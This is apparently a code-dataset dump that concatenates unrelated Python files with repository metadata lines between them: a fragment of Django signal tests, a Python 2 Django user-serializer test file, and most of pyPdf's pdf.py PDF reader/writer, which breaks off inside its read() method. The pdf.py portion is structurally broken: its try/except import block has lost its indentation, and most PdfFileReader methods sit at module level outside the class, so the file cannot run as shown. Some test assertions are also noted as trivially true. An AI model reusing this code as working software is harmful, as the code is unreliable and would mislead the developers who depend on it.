        self.assertEqual(len(a_signal.receivers), 1)
        a_signal.disconnect(dispatch_uid="uid")
        self.assertTestIsClean(a_signal)

    def test_robust(self):
        """Test the send_robust() function"""
        def fails(val, **kwargs):
            raise ValueError('this')
        a_signal.connect(fails)
        result = a_signal.send_robust(sender=self, val="test")
        err = result[0][1]
        self.assertIsInstance(err, ValueError)
        self.assertEqual(err.args, ('this',))
        # send_robust() attaches the traceback to the caught exception.
        self.assertTrue(hasattr(err, '__traceback__'))
        self.assertIsInstance(err.__traceback__, TracebackType)
        a_signal.disconnect(fails)
        self.assertTestIsClean(a_signal)

    def test_disconnection(self):
        receiver_1 = Callable()
        receiver_2 = Callable()
        receiver_3 = Callable()
        a_signal.connect(receiver_1)
        a_signal.connect(receiver_2)
        a_signal.connect(receiver_3)
        a_signal.disconnect(receiver_1)
        # receiver_2 is dropped implicitly via garbage collection rather
        # than via an explicit disconnect.
        del receiver_2
        garbage_collect()
        a_signal.disconnect(receiver_3)
        self.assertTestIsClean(a_signal)

    def test_values_returned_by_disconnection(self):
        # disconnect() reports whether anything was actually removed.
        receiver_1 = Callable()
        receiver_2 = Callable()
        a_signal.connect(receiver_1)
        receiver_1_disconnected = a_signal.disconnect(receiver_1)
        receiver_2_disconnected = a_signal.disconnect(receiver_2)
        self.assertTrue(receiver_1_disconnected)
        self.assertFalse(receiver_2_disconnected)
        self.assertTestIsClean(a_signal)

    def test_has_listeners(self):
        # has_listeners() tracks connect/disconnect, for both the
        # sender-less and per-sender forms.
        self.assertFalse(a_signal.has_listeners())
        self.assertFalse(a_signal.has_listeners(sender=object()))
        receiver_1 = Callable()
        a_signal.connect(receiver_1)
        self.assertTrue(a_signal.has_listeners())
        self.assertTrue(a_signal.has_listeners(sender=object()))
        a_signal.disconnect(receiver_1)
        self.assertFalse(a_signal.has_listeners())
        self.assertFalse(a_signal.has_listeners(sender=object()))
class ReceiverTestCase(unittest.TestCase):
    """
    Test suite for receiver.
    """

    def test_receiver_single_signal(self):
        # @receiver with a single signal connects the function to it.
        @receiver(a_signal)
        def f(val, **kwargs):
            self.state = val
        self.state = False
        a_signal.send(sender=self, val=True)
        self.assertTrue(self.state)

    def test_receiver_signal_list(self):
        # @receiver with a list of signals connects the function to each.
        @receiver([a_signal, b_signal, c_signal])
        def f(val, **kwargs):
            self.state.append(val)
        self.state = []
        a_signal.send(sender=self, val='a')
        c_signal.send(sender=self, val='c')
        b_signal.send(sender=self, val='b')
        self.assertIn('a', self.state)
        self.assertIn('b', self.state)
        self.assertIn('c', self.state)
| bsd-3-clause |
floatec/ProsDataBase | ProsDataBase/database/tests/usertest.py | 1 | 4552 | from django.test import TestCase
from ..models import *
from django.test.client import Client
from ..tests.factory import *
from ..views.api import *
class UserTest(TestCase):
    """Tests for UserSerializer and the /api/user/ endpoint (Python 2 code)."""

    def test_serializeAll(self):
        # Create 200 random users in two batches of 100 each.
        listofuser = list()
        listofuser2 = list()
        for i in range(1,101):
            listofuser.append(UserFactory.createRandomUser())
            listofuser2.append(UserFactory.createRandomUser())
        result = UserSerializer.serializeAll()
        # ===================================================
        # tests the count of the users
        # ===================================================
        length = 0
        for user in result["users"]:
            length += 1
        self.assertEquals(length, 200)
        # ===================================================
        # test the users are in the result
        # ===================================================
        for user in listofuser:
            self.assertTrue(user.username in result["users"])
        for user in listofuser2:
            self.assertTrue(user.username in result["users"])

    # (translated from German: "Now it fits")
    def test_serializeOne(self):
        user1 = UserFactory.createRandomUser()
        user2 = UserFactory.createRandomUser()
        # NOTE(review): these flags are set on the in-memory object only and
        # are never saved before serializeOne() is called -- the assertions
        # below check the local objects, not the serialized output; verify
        # this is the intended coverage.
        user2.tableCreator=True
        user2.admin=True
        user2.userManager=True
        user2.is_active = False
        result = UserSerializer.serializeOne(user1.username)
        result2 = UserSerializer.serializeOne(user2.username)
        print result
        print result2
        # ===================================================
        # test the user have the same name in the result
        # ===================================================
        self.assertTrue(user1.username in result["name"])
        self.assertTrue(user1.is_active)
        self.assertTrue(user1.tableCreator)
        self.assertFalse(user1.admin)
        self.assertFalse(user1.userManager)
        self.assertTrue(user2.username in result2["name"])
        self.assertFalse(user2.is_active)
        self.assertTrue(user2.tableCreator)
        self.assertTrue(user2.admin)
        self.assertTrue(user2.userManager)

    # (translated from German) NOTE(review): "a user without createTable
    # rights can create a table" -- this reads like a known-bug note; confirm.
    def test_serializeAllWithRights(self):
        user1 = UserFactory.createUserWithName("Gunther", "abc")
        user2 = UserFactory.createUserWithName("Mammut", "abx")
        table = StructureFactory.createTable(user1)
        UserFactory.createTableRights(user1,table)
        UserFactory.createTableRights(user2,table)
        result = UserSerializer.serializeAllWithRights(user1)
        print result
        # ================================================================
        # tests the name of the users
        # ================================================================
        self.assertTrue(user1.username in [user["name"] for user in result["users"]])
        self.assertTrue(user2.username in [user["name"] for user in result["users"]])
        # ================================================================
        # tests the userright is given to the right user
        # ================================================================
        for user in result["users"]:
            if user["name"] == user1.username:
                self.assertFalse(user["tableCreator"])
                self.assertTrue(user["active"])
                self.assertFalse(user["admin"])
                self.assertFalse(user["userManager"])
            elif user["name"] == user2.username:
                self.assertFalse(user["tableCreator"])
                self.assertTrue(user["active"])
                self.assertFalse(user["admin"])
                self.assertFalse(user["userManager"])

    def test_user(self):
        # Log in as a fresh user and hit the user-list endpoint.
        user = UserFactory.createRandomUser(password="test")
        c = Client()
        c.login(username=user.username, password="test")
        reqBody = dict()
        reqBody["users"] = list()
        for i in range(0,10):
            reqBody['users'].append({"name": LiteralFactory.genRandString()})
        userNames = list()
        for users in reqBody["users"]:
            userNames.append(users)
        # NOTE(review): this assertion compares a list with itself and is
        # trivially true; the response below is printed but never asserted.
        self.assertEquals(userNames, [users for users in reqBody["users"]])
        response = c.get(path='/api/user/')
        # self.assertEquals(userNames, [users for users["name"] in json.loads(response.content)["users"]])
        print [users for users["name"] in json.loads(response.content)["users"]]
        print userNames
| bsd-2-clause |
grundprinzip/rekind- | Resources/pyPdf/pdf.py | 2 | 63897 | # vim: sw=4:expandtab:foldmethod=marker
#
# Copyright (c) 2006, Mathieu Fenniak
# Copyright (c) 2007, Ashish Kulkarni <kulkarni.ashish@gmail.com>
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * The name of the author may not be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
A pure-Python PDF library with very minimal capabilities. It was designed to
be able to split and merge PDF files by page, and that's about all it can do.
It may be a solid base for future PDF file work in Python.
"""
__author__ = "Mathieu Fenniak"
__author_email__ = "biziqe@mathieu.fenniak.net"
import struct
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
import filters
import utils
import warnings
from generic import *
from utils import readNonWhitespace, readUntilWhitespace, ConvertFunctionsToVirtualList
from sets import ImmutableSet
##
# This class supports writing PDF files out, given pages produced by another
# class (typically {@link #PdfFileReader PdfFileReader}).
class PdfFileWriter(object):
    def __init__(self):
        """Set up an empty document: page tree root, /Info and /Catalog."""
        self._header = "%PDF-1.3"
        self._objects = []  # array of indirect objects; idnum = index + 1

        # The root of our page tree node.
        pages = DictionaryObject()
        pages.update({
            NameObject("/Type"): NameObject("/Pages"),
            NameObject("/Count"): NumberObject(0),
            NameObject("/Kids"): ArrayObject(),
        })
        self._pages = self._addObject(pages)

        # info object
        info = DictionaryObject()
        info.update({
            NameObject("/Producer"): createStringObject(u"Python PDF Library - http://pybrary.net/pyPdf/")
        })
        self._info = self._addObject(info)

        # root object
        root = DictionaryObject()
        root.update({
            NameObject("/Type"): NameObject("/Catalog"),
            NameObject("/Pages"): self._pages,
        })
        self._root = self._addObject(root)

    def _addObject(self, obj):
        """Append obj to the object list; return an IndirectObject to it."""
        self._objects.append(obj)
        # object numbers are 1-based
        return IndirectObject(len(self._objects), 0, self)

    def getObject(self, ido):
        """Resolve an IndirectObject that was created by this writer."""
        if ido.pdf != self:
            raise ValueError("pdf must be self")
        return self._objects[ido.idnum - 1]

    ##
    # Adds a page to this PDF file. The page is usually acquired from a
    # {@link #PdfFileReader PdfFileReader} instance.
    # <p>
    # Stability: Added in v1.0, will exist for all v1.x releases.
    #
    # @param page The page to add to the document. This argument should be
    #             an instance of {@link #PageObject PageObject}.
    def addPage(self, page):
        assert page["/Type"] == "/Page"
        # reparent the page under this writer's page tree
        page[NameObject("/Parent")] = self._pages
        page = self._addObject(page)
        pages = self.getObject(self._pages)
        pages["/Kids"].append(page)
        pages[NameObject("/Count")] = NumberObject(pages["/Count"] + 1)

    ##
    # Encrypt this PDF file with the PDF Standard encryption handler.
    # @param user_pwd The "user password", which allows for opening and reading
    # the PDF file with the restrictions provided.
    # @param owner_pwd The "owner password", which allows for opening the PDF
    # files without any restrictions. By default, the owner password is the
    # same as the user password.
    # @param use_128bit Boolean argument as to whether to use 128bit
    # encryption. When false, 40bit encryption will be used. By default, this
    # flag is on.
    def encrypt(self, user_pwd, owner_pwd = None, use_128bit = True):
        import md5, time, random
        if owner_pwd == None:
            owner_pwd = user_pwd
        if use_128bit:
            V = 2
            rev = 3
            keylen = 128 / 8  # Python 2 integer division: 16 bytes
        else:
            V = 1
            rev = 2
            keylen = 40 / 8
        # permit everything:
        P = -1
        # /O entry and file IDs per the standard security handler algorithms
        O = ByteStringObject(_alg33(owner_pwd, user_pwd, rev, keylen))
        ID_1 = md5.new(repr(time.time())).digest()
        ID_2 = md5.new(repr(random.random())).digest()
        self._ID = ArrayObject((ByteStringObject(ID_1), ByteStringObject(ID_2)))
        if rev == 2:
            U, key = _alg34(user_pwd, O, P, ID_1)
        else:
            assert rev == 3
            U, key = _alg35(user_pwd, rev, keylen, O, P, ID_1, False)
        encrypt = DictionaryObject()
        encrypt[NameObject("/Filter")] = NameObject("/Standard")
        encrypt[NameObject("/V")] = NumberObject(V)
        if V == 2:
            encrypt[NameObject("/Length")] = NumberObject(keylen * 8)
        encrypt[NameObject("/R")] = NumberObject(rev)
        encrypt[NameObject("/O")] = ByteStringObject(O)
        encrypt[NameObject("/U")] = ByteStringObject(U)
        encrypt[NameObject("/P")] = NumberObject(P)
        self._encrypt = self._addObject(encrypt)
        self._encrypt_key = key

    ##
    # Writes the collection of pages added to this object out as a PDF file.
    # <p>
    # Stability: Added in v1.0, will exist for all v1.x releases.
    # @param stream An object to write the file to. The object must support
    # the write method, and the tell method, similar to a file object.
    def write(self, stream):
        import struct, md5

        # pull any externally-referenced objects into self._objects first
        externalReferenceMap = {}
        self.stack = []
        self._sweepIndirectReferences(externalReferenceMap, self._root)
        del self.stack

        # Begin writing:
        object_positions = []
        stream.write(self._header + "\n")
        for i in range(len(self._objects)):
            idnum = (i + 1)
            obj = self._objects[i]
            object_positions.append(stream.tell())
            stream.write(str(idnum) + " 0 obj\n")
            key = None
            if hasattr(self, "_encrypt") and idnum != self._encrypt.idnum:
                # derive the per-object RC4 key: file key + idnum + generation
                pack1 = struct.pack("<i", i + 1)[:3]
                pack2 = struct.pack("<i", 0)[:2]
                key = self._encrypt_key + pack1 + pack2
                assert len(key) == (len(self._encrypt_key) + 5)
                md5_hash = md5.new(key).digest()
                key = md5_hash[:min(16, len(self._encrypt_key) + 5)]
            obj.writeToStream(stream, key)
            stream.write("\nendobj\n")

        # xref table (fixed-width entries, see PDF spec section 3.4.3)
        xref_location = stream.tell()
        stream.write("xref\n")
        stream.write("0 %s\n" % (len(self._objects) + 1))
        stream.write("%010d %05d f \n" % (0, 65535))
        for offset in object_positions:
            stream.write("%010d %05d n \n" % (offset, 0))

        # trailer
        stream.write("trailer\n")
        trailer = DictionaryObject()
        trailer.update({
            NameObject("/Size"): NumberObject(len(self._objects) + 1),
            NameObject("/Root"): self._root,
            NameObject("/Info"): self._info,
        })
        if hasattr(self, "_ID"):
            trailer[NameObject("/ID")] = self._ID
        if hasattr(self, "_encrypt"):
            trailer[NameObject("/Encrypt")] = self._encrypt
        trailer.writeToStream(stream, None)

        # eof
        stream.write("\nstartxref\n%s\n%%%%EOF\n" % (xref_location))

    def _sweepIndirectReferences(self, externMap, data):
        """Recursively walk *data*, copying any objects referenced from other
        PDFs into self._objects and rewriting their IndirectObjects.

        externMap maps (source pdf, generation, idnum) -> new IndirectObject;
        self.stack holds idnums on the current path to break reference cycles.
        """
        if isinstance(data, DictionaryObject):
            for key, value in data.items():
                origvalue = value
                value = self._sweepIndirectReferences(externMap, value)
                if isinstance(value, StreamObject):
                    # a dictionary value is a stream. streams must be indirect
                    # objects, so we need to change this value.
                    value = self._addObject(value)
                data[key] = value
            return data
        elif isinstance(data, ArrayObject):
            for i in range(len(data)):
                value = self._sweepIndirectReferences(externMap, data[i])
                if isinstance(value, StreamObject):
                    # an array value is a stream. streams must be indirect
                    # objects, so we need to change this value
                    value = self._addObject(value)
                data[i] = value
            return data
        elif isinstance(data, IndirectObject):
            # internal indirect references are fine
            if data.pdf == self:
                if data.idnum in self.stack:
                    # already being swept higher up the call chain (cycle)
                    return data
                else:
                    self.stack.append(data.idnum)
                    realdata = self.getObject(data)
                    self._sweepIndirectReferences(externMap, realdata)
                    self.stack.pop()
                    return data
            else:
                newobj = externMap.get(data.pdf, {}).get(data.generation, {}).get(data.idnum, None)
                if newobj == None:
                    newobj = data.pdf.getObject(data)
                    self._objects.append(None) # placeholder
                    idnum = len(self._objects)
                    newobj_ido = IndirectObject(idnum, 0, self)
                    if not externMap.has_key(data.pdf):
                        externMap[data.pdf] = {}
                    if not externMap[data.pdf].has_key(data.generation):
                        externMap[data.pdf][data.generation] = {}
                    externMap[data.pdf][data.generation][data.idnum] = newobj_ido
                    newobj = self._sweepIndirectReferences(externMap, newobj)
                    # replace the placeholder with the fully-swept copy
                    self._objects[idnum-1] = newobj
                    return newobj_ido
                return newobj
        else:
            return data
##
# Initializes a PdfFileReader object. This operation can take some time, as
# the PDF stream's cross-reference tables are read into memory.
# <p>
# Stability: Added in v1.0, will exist for all v1.x releases.
#
# @param stream An object that supports the standard read and seek methods
# similar to a file object.
class PdfFileReader(object):
    def __init__(self, stream):
        """Parse the xref tables of *stream* and keep it open for lazy reads."""
        self.flattenedPages = None   # filled lazily by _flatten()
        self.resolvedObjects = {}    # cache: generation -> {idnum: object}
        self.read(stream)
        self.stream = stream
        # set True only while reading the /Encrypt dictionary itself
        self._override_encryption = False
##
# Retrieves the PDF file's document information dictionary, if it exists.
# Note that some PDF files use metadata streams instead of docinfo
# dictionaries, and these metadata streams will not be accessed by this
# function.
# <p>
# Stability: Added in v1.6, will exist for all future v1.x releases.
# @return Returns a {@link #DocumentInformation DocumentInformation}
# instance, or None if none exists.
def getDocumentInfo(self):
    """Return the trailer's /Info dict as DocumentInformation, or None."""
    if not self.trailer.has_key("/Info"):
        return None
    obj = self.trailer['/Info']
    retval = DocumentInformation()
    retval.update(obj)
    return retval

##
# Read-only property that accesses the {@link
# #PdfFileReader.getDocumentInfo getDocumentInfo} function.
# <p>
# Stability: Added in v1.7, will exist for all future v1.x releases.
documentInfo = property(lambda self: self.getDocumentInfo(), None, None)
##
# Retrieves XMP (Extensible Metadata Platform) data from the PDF document
# root.
# <p>
# Stability: Added in v1.12, will exist for all future v1.x releases.
# @return Returns a {@link #generic.XmpInformation XmlInformation}
# instance that can be used to access XMP metadata from the document.
# Can also return None if no metadata was found on the document root.
def getXmpMetadata(self):
    try:
        # disable decryption while reading document-level metadata;
        # restored even if the read raises
        self._override_encryption = True
        return self.trailer["/Root"].getXmpMetadata()
    finally:
        self._override_encryption = False

##
# Read-only property that accesses the {@link #PdfFileReader.getXmpMetadata
# getXmpMetadata} function.
# <p>
# Stability: Added in v1.12, will exist for all future v1.x releases.
xmpMetadata = property(lambda self: self.getXmpMetadata(), None, None)
##
# Calculates the number of pages in this PDF file.
# <p>
# Stability: Added in v1.0, will exist for all v1.x releases.
# @return Returns an integer.
def getNumPages(self):
    # flatten the page tree on first access, then just count leaves
    if self.flattenedPages == None:
        self._flatten()
    return len(self.flattenedPages)

##
# Read-only property that accesses the {@link #PdfFileReader.getNumPages
# getNumPages} function.
# <p>
# Stability: Added in v1.7, will exist for all future v1.x releases.
numPages = property(lambda self: self.getNumPages(), None, None)
##
# Retrieves a page by number from this PDF file.
# <p>
# Stability: Added in v1.0, will exist for all v1.x releases.
# @return Returns a {@link #PageObject PageObject} instance.
def getPage(self, pageNumber):
    ## ensure that we're not trying to access an encrypted PDF
    #assert not self.trailer.has_key("/Encrypt")
    # NOTE(review): the encryption guard above is commented out, so pages of
    # an encrypted document may be returned undecrypted -- confirm intended.
    if self.flattenedPages == None:
        self._flatten()
    return self.flattenedPages[pageNumber]

##
# Read-only property that accesses the
# {@link #PdfFileReader.getNamedDestinations
# getNamedDestinations} function.
# <p>
# Stability: Added in v1.10, will exist for all future v1.x releases.
namedDestinations = property(lambda self:
                             self.getNamedDestinations(), None, None)
##
# Retrieves the named destinations present in the document.
# <p>
# Stability: Added in v1.10, will exist for all future v1.x releases.
# @return Returns a dict which maps names to {@link #Destination
# destinations}.
def getNamedDestinations(self, tree=None, retval=None):
    # retval == None marks the top-level call: locate the name tree
    # (either the old-style /Dests or the /Names -> /Dests name tree).
    if retval == None:
        retval = {}
        catalog = self.trailer["/Root"]
        # get the name tree
        if catalog.has_key("/Dests"):
            tree = catalog["/Dests"]
        elif catalog.has_key("/Names"):
            names = catalog['/Names']
            if names.has_key("/Dests"):
                tree = names['/Dests']
    if tree == None:
        return retval
    if tree.has_key("/Kids"):
        # recurse down the tree
        for kid in tree["/Kids"]:
            self.getNamedDestinations(kid.getObject(), retval)
    if tree.has_key("/Names"):
        # /Names is a flat array of alternating [name, destination] pairs
        names = tree["/Names"]
        for i in range(0, len(names), 2):
            key = names[i].getObject()
            val = names[i+1].getObject()
            if isinstance(val, DictionaryObject) and val.has_key('/D'):
                # dictionary form: the actual destination is under /D
                val = val['/D']
            dest = self._buildDestination(key, val)
            if dest != None:
                retval[key] = dest
    return retval

##
# Read-only property that accesses the {@link #PdfFileReader.getOutlines
# getOutlines} function.
# <p>
# Stability: Added in v1.10, will exist for all future v1.x releases.
outlines = property(lambda self: self.getOutlines(), None, None)
##
# Retrieves the document outline present in the document.
# <p>
# Stability: Added in v1.10, will exist for all future v1.x releases.
# @return Returns a nested list of {@link #Destination destinations}.
def getOutlines(self, node=None, outlines=None):
    # outlines == None marks the top-level call: find the first outline
    # item and prime the named-destination lookup table.
    if outlines == None:
        outlines = []
        catalog = self.trailer["/Root"]
        # get the outline dictionary and named destinations
        if catalog.has_key("/Outlines"):
            lines = catalog["/Outlines"]
            if lines.has_key("/First"):
                node = lines["/First"]
        self._namedDests = self.getNamedDestinations()
    if node == None:
        return outlines
    # see if there are any more outlines
    while 1:
        outline = self._buildOutline(node)
        if outline:
            outlines.append(outline)
        # check for sub-outlines; children are appended as a nested list
        if node.has_key("/First"):
            subOutlines = []
            self.getOutlines(node["/First"], subOutlines)
            if subOutlines:
                outlines.append(subOutlines)
        if not node.has_key("/Next"):
            break
        node = node["/Next"]
    return outlines
def _buildDestination(self, title, array):
    """Create a Destination from a raw PDF destination array.

    The array layout is [page, fit-type, args...]; the leading two
    entries are split off and the remainder forwarded verbatim.
    """
    page = array[0]
    typ = array[1]
    return Destination(title, page, typ, *array[2:])
def _buildOutline(self, node):
    """Build one Destination from an outline node, or None if unsupported."""
    dest, title, outline = None, None, None
    if node.has_key("/A") and node.has_key("/Title"):
        # Action, section 8.5 (only type GoTo supported)
        title = node["/Title"]
        action = node["/A"]
        if action["/S"] == "/GoTo":
            dest = action["/D"]
    elif node.has_key("/Dest") and node.has_key("/Title"):
        # Destination, section 8.2.1
        title = node["/Title"]
        dest = node["/Dest"]
    # if destination found, then create outline
    if dest:
        if isinstance(dest, ArrayObject):
            # explicit destination array
            outline = self._buildDestination(title, dest)
        elif isinstance(dest, unicode) and self._namedDests.has_key(dest):
            # named destination: reuse the prebuilt entry, relabel it
            outline = self._namedDests[dest]
            outline[NameObject("/Title")] = title
        else:
            raise utils.PdfReadError("Unexpected destination %r" % dest)
    return outline
##
# Read-only property that emulates a list based upon the {@link
# #PdfFileReader.getNumPages getNumPages} and {@link #PdfFileReader.getPage
# getPage} functions.
# <p>
# Stability: Added in v1.7, and will exist for all future v1.x releases.
pages = property(lambda self: ConvertFunctionsToVirtualList(self.getNumPages, self.getPage),
                 None, None)
def _flatten(self, pages=None, inherit=None):
    """Walk the /Pages tree depth-first, collecting leaf pages into
    self.flattenedPages and pushing inheritable attributes down to them."""
    inheritablePageAttributes = (
        NameObject("/Resources"), NameObject("/MediaBox"),
        NameObject("/CropBox"), NameObject("/Rotate")
    )
    if inherit == None:
        inherit = dict()
    if pages == None:
        # top-level call: start from the catalog's page tree root
        self.flattenedPages = []
        catalog = self.trailer["/Root"].getObject()
        pages = catalog["/Pages"].getObject()
    t = pages["/Type"]
    if t == "/Pages":
        # interior node: record inheritable attributes, recurse into kids.
        # NOTE(review): the same `inherit` dict is passed to every kid, so
        # attributes picked up in one subtree leak into later siblings --
        # verify against the upstream pyPdf behavior.
        for attr in inheritablePageAttributes:
            if pages.has_key(attr):
                inherit[attr] = pages[attr]
        for page in pages["/Kids"]:
            self._flatten(page.getObject(), inherit)
    elif t == "/Page":
        for attr,value in inherit.items():
            # if the page has its own value, it does not inherit the
            # parent's value:
            if not pages.has_key(attr):
                pages[attr] = value
        pageObj = PageObject(self)
        pageObj.update(pages)
        self.flattenedPages.append(pageObj)
def getObject(self, indirectReference):
    """Resolve an indirect reference to a concrete object.

    Consults the resolved-object cache, then object streams (/ObjStm),
    then the cross-reference table; decrypts the result when the file
    is encrypted and a decryption key is available.
    """
    retval = self.resolvedObjects.get(indirectReference.generation, {}).get(indirectReference.idnum, None)
    if retval != None:
        return retval
    if indirectReference.generation == 0 and \
            self.xref_objStm.has_key(indirectReference.idnum):
        # indirect reference to object in object stream
        # read the entire object stream into memory
        stmnum,idx = self.xref_objStm[indirectReference.idnum]
        objStm = IndirectObject(stmnum, 0, self).getObject()
        assert objStm['/Type'] == '/ObjStm'
        assert idx < objStm['/N']
        streamData = StringIO(objStm.getData())
        # the stream header is pairs of (object number, byte offset);
        # cache every object in the stream, not just the requested one.
        # NOTE(review): assumes self.resolvedObjects[0] already exists --
        # confirm it is created during read().
        for i in range(objStm['/N']):
            objnum = NumberObject.readFromStream(streamData)
            readNonWhitespace(streamData)
            streamData.seek(-1, 1)
            offset = NumberObject.readFromStream(streamData)
            readNonWhitespace(streamData)
            streamData.seek(-1, 1)
            t = streamData.tell()
            streamData.seek(objStm['/First']+offset, 0)
            obj = readObject(streamData, self)
            self.resolvedObjects[0][objnum] = obj
            streamData.seek(t, 0)
        return self.resolvedObjects[0][indirectReference.idnum]
    start = self.xref[indirectReference.generation][indirectReference.idnum]
    self.stream.seek(start, 0)
    idnum, generation = self.readObjectHeader(self.stream)
    assert idnum == indirectReference.idnum
    assert generation == indirectReference.generation
    retval = readObject(self.stream, self)
    # override encryption is used for the /Encrypt dictionary
    if not self._override_encryption and self.isEncrypted:
        # if we don't have the encryption key:
        if not hasattr(self, '_decryption_key'):
            raise Exception, "file has not been decrypted"
        # otherwise, decrypt here: per-object RC4 key is the file key
        # plus the low bytes of the object and generation numbers
        import struct, md5
        pack1 = struct.pack("<i", indirectReference.idnum)[:3]
        pack2 = struct.pack("<i", indirectReference.generation)[:2]
        key = self._decryption_key + pack1 + pack2
        assert len(key) == (len(self._decryption_key) + 5)
        md5_hash = md5.new(key).digest()
        key = md5_hash[:min(16, len(self._decryption_key) + 5)]
        retval = self._decryptObject(retval, key)
    self.cacheIndirectObject(generation, idnum, retval)
    return retval
def _decryptObject(self, obj, key):
    """Recursively RC4-decrypt strings and stream data inside *obj* in place
    (strings are replaced; containers are mutated) and return it."""
    if isinstance(obj, ByteStringObject) or isinstance(obj, TextStringObject):
        obj = createStringObject(utils.RC4_encrypt(key, obj.original_bytes))
    elif isinstance(obj, StreamObject):
        obj._data = utils.RC4_encrypt(key, obj._data)
    elif isinstance(obj, DictionaryObject):
        for dictkey, value in obj.items():
            obj[dictkey] = self._decryptObject(value, key)
    elif isinstance(obj, ArrayObject):
        for i in range(len(obj)):
            obj[i] = self._decryptObject(obj[i], key)
    return obj
def readObjectHeader(self, stream):
    """Consume an 'idnum generation obj' header at the current stream
    position and return (idnum, generation) as ints."""
    # Should never be necessary to read out whitespace, since the
    # cross-reference table should put us in the right spot to read the
    # object header. In reality... some files have stupid cross reference
    # tables that are off by whitespace bytes.
    readNonWhitespace(stream); stream.seek(-1, 1)
    idnum = readUntilWhitespace(stream)
    generation = readUntilWhitespace(stream)
    # the 3 bytes read here are discarded -- presumably the literal "obj"
    # keyword; verify against the PDF object syntax
    obj = stream.read(3)
    readNonWhitespace(stream)
    stream.seek(-1, 1)
    return int(idnum), int(generation)
def cacheIndirectObject(self, generation, idnum, obj):
    """Memoize a resolved object under its generation and object number."""
    # setdefault creates the per-generation sub-cache on first use
    self.resolvedObjects.setdefault(generation, {})[idnum] = obj
def read(self, stream):
    """Parse the cross-reference structure of the PDF in *stream*.

    Walks the chain of cross-reference sections backwards from the %%EOF
    marker, populating:
      self.xref        -- {generation: {object number: byte offset}}
      self.xref_objStm -- {object number: [object stream number, index]}
      self.trailer     -- merged trailer dictionary; because the file is
                          read newest-section-first and existing keys are
                          never overwritten, the most recent incremental
                          update wins.

    Handles both classic "xref" tables and PDF 1.5+ cross-reference
    streams.  Raises utils.PdfReadError on structural errors.
    """
    # start at the end:
    stream.seek(-1, 2)
    line = ''
    while not line:
        line = self.readNextEndLine(stream)
    if line[:5] != "%%EOF":
        raise utils.PdfReadError, "EOF marker not found"
    # find startxref entry - the location of the xref table
    line = self.readNextEndLine(stream)
    startxref = int(line)
    line = self.readNextEndLine(stream)
    if line[:9] != "startxref":
        raise utils.PdfReadError, "startxref not found"
    # read all cross reference tables and their trailers
    self.xref = {}
    self.xref_objStm = {}
    self.trailer = DictionaryObject()
    while 1:
        # load the xref table
        stream.seek(startxref, 0)
        x = stream.read(1)
        if x == "x":
            # standard cross-reference table
            ref = stream.read(4)
            if ref[:3] != "ref":
                raise utils.PdfReadError, "xref table read error"
            readNonWhitespace(stream)
            stream.seek(-1, 1)
            while 1:
                # each subsection starts with "<first object num> <count>"
                num = readObject(stream, self)
                readNonWhitespace(stream)
                stream.seek(-1, 1)
                size = readObject(stream, self)
                readNonWhitespace(stream)
                stream.seek(-1, 1)
                cnt = 0
                while cnt < size:
                    line = stream.read(20)
                    # It's very clear in section 3.4.3 of the PDF spec
                    # that all cross-reference table lines are a fixed
                    # 20 bytes.  However... some malformed PDF files
                    # use a single character EOL without a preceeding
                    # space.  Detect that case, and seek the stream
                    # back one character.  (0-9 means we've bled into
                    # the next xref entry, t means we've bled into the
                    # text "trailer"):
                    if line[-1] in "0123456789t":
                        stream.seek(-1, 1)
                    offset, generation = line[:16].split(" ")
                    offset, generation = int(offset), int(generation)
                    if not self.xref.has_key(generation):
                        self.xref[generation] = {}
                    if self.xref[generation].has_key(num):
                        # It really seems like we should allow the last
                        # xref table in the file to override previous
                        # ones.  Since we read the file backwards, assume
                        # any existing key is already set correctly.
                        pass
                    else:
                        self.xref[generation][num] = offset
                    cnt += 1
                    num += 1
                readNonWhitespace(stream)
                stream.seek(-1, 1)
                trailertag = stream.read(7)
                if trailertag != "trailer":
                    # more xrefs!
                    stream.seek(-7, 1)
                else:
                    break
            # parse the trailer dictionary that follows the table
            readNonWhitespace(stream)
            stream.seek(-1, 1)
            newTrailer = readObject(stream, self)
            for key, value in newTrailer.items():
                if not self.trailer.has_key(key):
                    self.trailer[key] = value
            if newTrailer.has_key("/Prev"):
                # follow the chain to the previous xref section
                startxref = newTrailer["/Prev"]
            else:
                break
        elif x.isdigit():
            # PDF 1.5+ Cross-Reference Stream
            stream.seek(-1, 1)
            idnum, generation = self.readObjectHeader(stream)
            xrefstream = readObject(stream, self)
            assert xrefstream["/Type"] == "/XRef"
            self.cacheIndirectObject(generation, idnum, xrefstream)
            streamData = StringIO(xrefstream.getData())
            # /Index is a flat list of (first object number, count) pairs;
            # defaults to a single run covering objects 0../Size-1.
            idx_pairs = xrefstream.get("/Index", [0, xrefstream.get("/Size")])
            # /W gives the byte width of each of the (up to 3) entry fields.
            entrySizes = xrefstream.get("/W")
            for num, size in self._pairs(idx_pairs):
                cnt = 0
                while cnt < size:
                    for i in range(len(entrySizes)):
                        d = streamData.read(entrySizes[i])
                        di = convertToInt(d, entrySizes[i])
                        if i == 0:
